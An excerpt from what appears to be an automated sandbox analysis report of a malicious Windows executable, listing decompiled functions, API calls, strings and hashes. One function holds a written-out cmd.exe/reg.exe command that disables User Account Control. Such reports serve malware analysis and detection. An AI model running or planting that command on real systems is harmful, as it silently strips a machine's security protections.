                                              • API String ID: 493672254-0
                                              • Opcode ID: 465ab7c2e076ec59a8d270df8ce72ad0174e5281a4bfe7e39c5caa5367581a5e
                                              • Instruction ID: 77e668261cf9ee2bd18e5a0e87596c089765e66a1be6d3c981f75cbf7ed2a716
                                              • Opcode Fuzzy Hash: 465ab7c2e076ec59a8d270df8ce72ad0174e5281a4bfe7e39c5caa5367581a5e
                                              • Instruction Fuzzy Hash: A7016D311462157AD6111B34AC4EFFB3B6CDB02772F10032BF625965D1DA68CE8195AB
                                              Function 00448295 Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                              Download Yara Rule
                                              APIs
                                              • GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                              • _free.LIBCMT ref: 004482CC
                                              • _free.LIBCMT ref: 004482F4
                                              • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 00448301
                                              • SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                              • _abort.LIBCMT ref: 00448313
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ErrorLast$_free$_abort
                                              • String ID:
                                              • API String ID: 3160817290-0
                                              • Opcode ID: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                              • Instruction ID: 8d34d3ffa9a8a5ca7629c839d325bdddc3ef58a145117f7ac1d0225592351e3a
                                              • Opcode Fuzzy Hash: 0dc6b6a3e4ae5b17dec3dccad88ee1f92140bcc2d5108ccd544116d6be2417e2
                                              • Instruction Fuzzy Hash: 8EF0A435101B006BF611772A6C06B6F26599BD3B69F36042FFD18962D2EF6DCC42816D
                                              Function 0041AB37 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000020,00000000,00000001,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB46
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000020,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB5A
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB67
                                              • ControlService.ADVAPI32(00000000,00000001,?,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB76
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB88
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A6B4,00000000), ref: 0041AB8B
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: f94ae9c5674c9adfc346e263051d54d626d5e40d867c234dda8e9c50f9d09011
                                              • Instruction ID: 443f58cffa4f299642b313368f914f767bd977a6fac550f0ec2f38f013616b5a
                                              • Opcode Fuzzy Hash: f94ae9c5674c9adfc346e263051d54d626d5e40d867c234dda8e9c50f9d09011
                                              • Instruction Fuzzy Hash: E4F0F631541318BBD7116F259C49DFF3B6CDB45B62F000026FE0992192EB68DD4595F9
                                              Function 0041AC3B Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC4A
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC5E
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC6B
                                              • ControlService.ADVAPI32(00000000,00000002,?,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC7A
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8C
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A634,00000000), ref: 0041AC8F
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: 497ef82d1474d54709910eeaca97da118b40a23fe9dfeecc14ddd5be20b51566
                                              • Instruction ID: 80b71cf000cc834045a6d48b23744411b71cc7e49355023a2f572df053a73ec4
                                              • Opcode Fuzzy Hash: 497ef82d1474d54709910eeaca97da118b40a23fe9dfeecc14ddd5be20b51566
                                              • Instruction Fuzzy Hash: 73F0C231501218ABD611AF65AC4AEFF3B6CDB45B62F00002AFE0992192EB38CD4595E9
                                              Function 0041ACA2 Relevance: 9.0, APIs: 6, Instructions: 45serviceCOMMON
                                              Download Yara Rule
                                              APIs
                                              • OpenSCManagerW.ADVAPI32(00000000,00000000,00000040,00000000,00000001,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACB1
                                              • OpenServiceW.ADVAPI32(00000000,00000000,00000040,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACC5
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACD2
                                              • ControlService.ADVAPI32(00000000,00000003,?,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACE1
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF3
                                              • CloseServiceHandle.ADVAPI32(00000000,?,?,?,?,?,?,0041A5B4,00000000), ref: 0041ACF6
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Service$CloseHandle$Open$ControlManager
                                              • String ID:
                                              • API String ID: 221034970-0
                                              • Opcode ID: cf41fc214d4f8651c842d323f4a9434d7ee1c2a315675ff23975f89e6a089888
                                              • Instruction ID: 4c72e2560426042a93d841201029be6eaa37955ba2c7d49e75f16ae618c5df44
                                              • Opcode Fuzzy Hash: cf41fc214d4f8651c842d323f4a9434d7ee1c2a315675ff23975f89e6a089888
                                              • Instruction Fuzzy Hash: 85F0F631501228BBD7116F25AC49DFF3B6CDB45B62F00002AFE0992192EB38CD46A6F9
                                              Function 0044E769 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 168COMMON
                                              Download Yara Rule
                                              APIs
                                              • _strpbrk.LIBCMT ref: 0044E7B8
                                              • _free.LIBCMT ref: 0044E8D5
                                                • Part of subcall function 0043BD68: IsProcessorFeaturePresent.KERNEL32(00000017,0043BD3A,00405103,?,00000000,00000000,004020A6,00000000,00000000,?,0043BD5A,00000000,00000000,00000000,00000000,00000000), ref: 0043BD6A
                                                • Part of subcall function 0043BD68: GetCurrentProcess.KERNEL32(C0000417,?,00405103), ref: 0043BD8C
                                                • Part of subcall function 0043BD68: TerminateProcess.KERNEL32(00000000,?,00405103), ref: 0043BD93
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CurrentFeaturePresentProcessorTerminate_free_strpbrk
                                              • String ID: *?$.$v%(/
                                              • API String ID: 2812119850-1337875965
                                              • Opcode ID: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                              • Instruction ID: bbc13fc8ee10fdca904a4e9292213e09ebfa005f106ef5a16faeda3ce4fd08f7
                                              • Opcode Fuzzy Hash: 425935087bf6a06ef5f668eca0c2840133b7cce1b1476d2e54c501535b2ee598
                                              • Instruction Fuzzy Hash: C251B175E00209AFEF14DFAAC881AAEF7B5FF58314F24416EE844E7341E6399A018B54
                                              Function 004434D5 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 116COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe,00000104), ref: 00443515
                                              • _free.LIBCMT ref: 004435E0
                                              • _free.LIBCMT ref: 004435EA
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: _free$FileModuleName
                                              • String ID: 8(Z$C:\Users\user\Desktop\17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5f2f2506.dat-decoded.exe
                                              • API String ID: 2506810119-253795733
                                              • Opcode ID: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                              • Instruction ID: e5efe6401a3e5f1db0e1141fbbc5a3d1caea7301f6195c2e8eaff0a3f5655f7e
                                              • Opcode Fuzzy Hash: 85df99244543f45e80e68b9da345e50485f416d8f0a3fa02bb076d818d98866e
                                              • Instruction Fuzzy Hash: D63193B1A00254BFEB21DF9A998199EBBF8EB84B15F10406BF40597311D6B88F41CB99
                                              Function 0041B71B Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 91COMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 00413656: RegOpenKeyExW.ADVAPI32(80000001,00000400,00000000,00020019,?,004750E4), ref: 00413678
                                                • Part of subcall function 00413656: RegQueryValueExW.ADVAPI32(?,0040F34E,00000000,00000000,?,00000400), ref: 00413697
                                                • Part of subcall function 00413656: RegCloseKey.ADVAPI32(?), ref: 004136A0
                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                              • _wcslen.LIBCMT ref: 0041B7F4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Process$CloseCurrentOpenQueryValueWow64_wcslen
                                              • String ID: .exe$http\shell\open\command$program files (x86)\$program files\
                                              • API String ID: 3286818993-4246244872
                                              • Opcode ID: 21ce8c3951ea68e9f4768855c246d238a69c4de2a44f28aaa4944944c55ea733
                                              • Instruction ID: 00334f857bbe6022557327a28fa8f115e820bd32ca6b34e50ab8c41aa79dd428
                                              • Opcode Fuzzy Hash: 21ce8c3951ea68e9f4768855c246d238a69c4de2a44f28aaa4944944c55ea733
                                              • Instruction Fuzzy Hash: 42218872A001046BDB14BAB59CD6AFE766D9B48728F10043FF505B72C3EE3C9D49426D
                                              Function 00443B52 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 59COMMON
                                              Download Yara Rule
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID:
                                              • String ID: `#[
                                              • API String ID: 0-4119260463
                                              • Opcode ID: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                              • Instruction ID: 437de9af4247593539f95cdbb70b1dc5411192884b5f12beac7b10196549b189
                                              • Opcode Fuzzy Hash: d36049e99d51c5662ea1cdccde7f001ca18baa555cb14a41c95be32ad22d597f
                                              • Instruction Fuzzy Hash: CB01ADB26096527ABA202E796CC5E27634CDB42BBA335037BF821512E3DF68DE054169
                                              Function 0041D5A0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 57registryCOMMON
                                              Download Yara Rule
                                              APIs
                                              • RegisterClassExA.USER32(00000030), ref: 0041D5EC
                                              • CreateWindowExA.USER32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,000000FD,00000000,00000000,00000000), ref: 0041D607
                                              • GetLastError.KERNEL32 ref: 0041D611
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: ClassCreateErrorLastRegisterWindow
                                              • String ID: 0$MsgWindowClass
                                              • API String ID: 2877667751-2410386613
                                              • Opcode ID: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                              • Instruction ID: e808ecd18ef19f47bd472c0c6462b34ef8490c58390ad3ae495a6aa035ed2a4b
                                              • Opcode Fuzzy Hash: 722de5e8388a8877474a119f468a3301e062738380f3873f65828015e8b741e1
                                              • Instruction Fuzzy Hash: 1F0125B1D00219ABDB00DFA5EC849EFBBBCEA08355F40453AF914A6241EB7589058AA4
                                              Function 00407790 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 43processCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,?,?), ref: 004077D6
                                              • CloseHandle.KERNEL32(?), ref: 004077E5
                                              • CloseHandle.KERNEL32(?), ref: 004077EA
                                              Strings
                                              • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 004077CC
                                              • C:\Windows\System32\cmd.exe, xrefs: 004077D1
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: CloseHandle$CreateProcess
                                              • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe
                                              • API String ID: 2922976086-4183131282
                                              • Opcode ID: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                              • Instruction ID: 1887ccd63cb29ce90d3c4a9dee080bc6fb52b3336ad705aa4023eed0db3a7680
                                              • Opcode Fuzzy Hash: c38a1c4fbaf06b70ee3143182280ce63ac5342037887d892980c2b2f1eb259a7
                                              • Instruction Fuzzy Hash: 04F09672D4029C76CB20ABD7AC0EEDF7F3CEBC5B11F00051AF904A2045DA745400CAB5
                                              Function 004050E4 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 35synchronizationCOMMON
                                              Download Yara Rule
                                              APIs
                                              • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00405120
                                              • SetEvent.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 0040512C
                                              • WaitForSingleObject.KERNEL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405137
                                              • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00404E7A,00000001), ref: 00405140
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Event$CloseCreateHandleLocalObjectSingleTimeWait
                                              • String ID: KeepAlive | Disabled
                                              • API String ID: 2993684571-305739064
                                              • Opcode ID: 79b17cb61ca097f2dd87540d91e49b40a86234966918d688794a6c742f2a43ed
                                              • Instruction ID: dc79248355977efa3495ea8e96f68553e1f2867eb32bbe7dc6984d352a193ca4
                                              • Opcode Fuzzy Hash: 79b17cb61ca097f2dd87540d91e49b40a86234966918d688794a6c742f2a43ed
                                              • Instruction Fuzzy Hash: 5DF06D71904711BBDB203B758D0AAAB7E95AB06315F0009BEF982916E2D6798C408F9A
                                              Function 0041AE51 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 30sleepCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041B580: GetLocalTime.KERNEL32(00000000), ref: 0041B59A
                                              • GetModuleHandleA.KERNEL32(00000000,00020009), ref: 0041AE83
                                              • PlaySoundW.WINMM(00000000,00000000), ref: 0041AE91
                                              • Sleep.KERNEL32(00002710), ref: 0041AE98
                                              • PlaySoundW.WINMM(00000000,00000000,00000000), ref: 0041AEA1
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: PlaySound$HandleLocalModuleSleepTime
                                              • String ID: Alarm triggered
                                              • API String ID: 614609389-2816303416
                                              • Opcode ID: 7392df8db2022c5dabbdd0a7ddbeb5ff2cdfd3fc416767bfd221d1b9e2b6ff7c
                                              • Instruction ID: 264e31dd7f8ae4a58c3cd97330858728e5483d82e525179ed11d996d756d41c5
                                              • Opcode Fuzzy Hash: 7392df8db2022c5dabbdd0a7ddbeb5ff2cdfd3fc416767bfd221d1b9e2b6ff7c
                                              • Instruction Fuzzy Hash: 3EE0D826A40220779A10337B6D0FD6F3D29CAC3B2570100BFFA05660C2DD540C01C6FB
                                              Function 0041CDE9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 27COMMON
                                              Download Yara Rule
                                              APIs
                                              • GetStdHandle.KERNEL32(000000F5,00000000,?,?,?,?,?,?,0041CE7E), ref: 0041CDF3
                                              • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE00
                                              • SetConsoleTextAttribute.KERNEL32(00000000,0000000C,?,?,?,?,?,?,0041CE7E), ref: 0041CE0D
                                              • SetConsoleTextAttribute.KERNEL32(00000000,?,?,?,?,?,?,?,0041CE7E), ref: 0041CE20
                                              Strings
                                              • ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/ , xrefs: 0041CE13
                                              Memory Dump Source
                                              • Source File: 00000000.00000002.4629801754.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                              • Associated: 00000000.00000002.4629779659.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629852631.0000000000459000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000471000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629879567.0000000000474000.00000004.00000001.01000000.00000003.sdmpDownload File
                                              • Associated: 00000000.00000002.4629913481.0000000000478000.00000002.00000001.01000000.00000003.sdmpDownload File
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_0_2_400000_17290972857e17e6647ac26d58174b5fefe0786260e8980dd73b8a668e056eb8647ce5.jbxd
                                              Yara matches
                                              Similarity
                                              • API ID: Console$AttributeText$BufferHandleInfoScreen
                                              • String ID: ______ (_____ \ _____) )_____ ____ ____ ___ ___ | __ /| ___ | \ / ___) _ \ /___)| | \ \| ____| | | ( (__| |_| |___ ||_| |_|_____)_|_|_|\____)___/(___/
                                              • API String ID: 3024135584-2418719853
                                              • Opcode ID: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                              • Instruction ID: 3099d3b49c49d1df3d44327ff87017ee7d1b0803ff7cdb2815dc6b7c28d9377e
                                              • Opcode Fuzzy Hash: e39debb9b2b39d29e793f9bd33498d8add4ef2108ba1fa2e7e75c33182c8a1d6
                                              • Instruction Fuzzy Hash: B6E04872504315E7E31027B5EC4DCAB7B7CE745613B100266FA16915D39A749C41C6B5
                                              Function 0040F938 Relevance: 7.6, APIs: 5, Instructions: 132processCOMMON
                                              Download Yara Rule
                                              APIs
                                                • Part of subcall function 0041C048: GetCurrentProcess.KERNEL32(?,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C059
                                                • Part of subcall function 0041C048: IsWow64Process.KERNEL32(00000000,?,?,0040DAE5,WinDir,00000000,00000000), ref: 0041C060
                                              • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0040F956
